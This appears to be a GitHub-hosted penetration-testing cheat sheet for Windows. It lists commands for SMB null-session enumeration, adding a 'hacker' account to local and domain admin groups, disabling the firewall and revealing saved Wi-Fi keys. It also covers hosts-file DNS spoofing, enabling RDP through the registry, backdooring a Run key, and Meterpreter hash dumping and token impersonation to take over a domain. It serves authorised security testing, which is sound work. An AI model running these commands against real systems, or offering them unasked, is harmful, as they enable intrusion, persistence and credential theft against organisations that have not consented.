forked from 3mrgnc3/pentest_old
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwindows.txt
205 lines (154 loc) · 6.79 KB
/
windows.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
Windows
# Anonymous users can obtain the Windows password policy
msf > use auxiliary/scanner/smb/smb_enumusers
------------------------------------------------------------------------------------------------------
# CIFS NULL Session Permitted
enum4linux -a <target IP>
rpcclient -U "" <target IP>
Enter 's password: <return>
rpcclient $>
srvinfo
enumdomusers
queryuser <user>
netshareenum
netshareenumall
querydominfo
getdompwinfo
net use \\target IP\ipc$ "" /u:"" # Windows
------------------------------------------------------------------------------------------------------
# CIFS Share Writeable By Everyone
Places > Network > Browse Network
------------------------------------------------------------------------------------------------------
# Connect anonymously
smbclient -N -L <target IP>
# Connect with credentials
smbclient -W domain -U user -L <target IP>
proxychains smbclient '//10.0.0.10/c$' -U 'domain.local/username%password'
------------------------------------------------------------------------------------------------------
# NetBIOS and SMB
nmap -Pn -n -T4 -p139,445 --script=smb-check-vulns --script-args=unsafe=1 <target range>
enum -G <target IP> # Windows
enum -P <target IP>
nbtenum -r <target IP> # Windows
nbtenum -q <target IP>
nbtscan -r <target range>
nbtscan -f hosts.txt
------------------------------------------------------------------------------------------------------
# Show domain users and group information
DumpSec
------------------------------------------------------------------------------------------------------
# Show members of domain groups
global.exe "domain admins" \\dc-controller
------------------------------------------------------------------------------------------------------
# Search all folders for filenames that include 'password'.
dir /s /p *password*.* # Windows
------------------------------------------------------------------------------------------------------
# net commands
net accounts # Local password policies.
net accounts /domain
net config workstation
net localgroup # Local Security Groups.
net localgroup /domain # Domain Security Groups.
net localgroup Administrators # Users in the local Administrators Security Group.
net localgroup Administrators /domain # Users in the domain Administrators Security Group.
net share
net user # Local users.
net user /domain > users.txt # All users in the current user's domain (take a few to run).
net user hacker /domain # Info on domain user.
net view # Computers in the users domain and other domains.
net view /domain # Computers in other domain.
net user hacker password /add
net localgroup administrators /add hacker
------------------------------------------------------------------------------------------------------
# Domain accounts
net group “Domain Admins" /domain > domain-admin.txt
net group “Domain Users" /domain > domain-users.txt
net user hacker password /add /domain
net group "Enterprise Admins" hacker /add /domain
net groups "Enterprise Admins" /domain
------------------------------------------------------------------------------------------------------
# Domain control
nbtstat -a <target IP>
The netbios hex code “1C” next to the domain name signifies that the system being polled is a domain
controller for the domain name listed on the left. If the “1C” would have been next to an Inet service
it would have signified it was an IIS server.
Note the differences between the U and the G. U = UNIQUE and G = GROUP. When you see a hex code next
to UNIQUE it is usually associated with the computer itself. With GROUP it is associated with the
workgroup or domain: https://support.microsoft.com/en-us/kb/163409
------------------------------------------------------------------------------------------------------
# Enumeration
arp -a
ipconfig /all
ipconfig /displaydns
netstat -ano
netstat -ano | findstr LISTENING
netstat -c
netstat -ns
netstat -vb
route print
date /t & time /t
doskey /history
gpresult /COMPUTERNAME
gpresult /%username%
gpresult /z
nbtstat -A <target IP>
nbtstat -a <name of target>
net group
net group administrators
net session
net start
set
tasklist /m
tasklist /svc
tasklist /v
dir c:\*.xls /s # Show all Excel docs.
dir c:\*.xlsx /s # Show all Excel docs.
dir c:\*.ppt /s # Show all PowerPoint docs.
dir c:\*.pptx /s # Show all PowerPoint docs.
dir c:\*.doc /s # Show all Word docs.
dir c:\*.docx /s # Show all Word docs.
dir c:\*.pdf /s # Show all PDFs.
------------------------------------------------------------------------------------------------------
# Firewall
netsh firewall show config
netsh firewall add portopening TCP 8081 ePO
netsh firewall set opmode disable # Disable firewall.
firewall show state
netsh firewall set opmode disable
netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show networks
netsh wlan show profiles
netsh wlan show profiles name="name"
show profiles name="name" key=clear
------------------------------------------------------------------------------------------------------
# Local DNS spoofing
echo <attacker IP> facebook >> %WINDIR%\System32\drivers\etc\hosts
type %WINDIR%\System32\drivers\etc\hosts
------------------------------------------------------------------------------------------------------
# Misc
cd \WINDOWS\system32\
type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
fsutil fsinfo drives
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh rdesktop <target-IP>
------------------------------------------------------------------------------------------------------
HKLM
File > Load Hive
Just give it a name.
/Microsoft Windows/Current Version/Run
Add your back doored file.
------------------------------------------------------------------------------------------------------
Show domain admin net group "Domain Admins" /domain
Dump the local hashes msf > run post/windows/gather/smart_hashdump
Show the admin msf > use auxiliary/scanner/smb/smb_enumusers_domain
Compromise an Admin's box
Assume token meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token domain\\adaministrator
meterpreter > getuid
Drop to a Windows shell meterpreter > shell
C:\> whoami
Add user to the domain C:\> net user hacker /add /domain
Add user to security group C:\> net group "Domain Admins" hacker /add /domain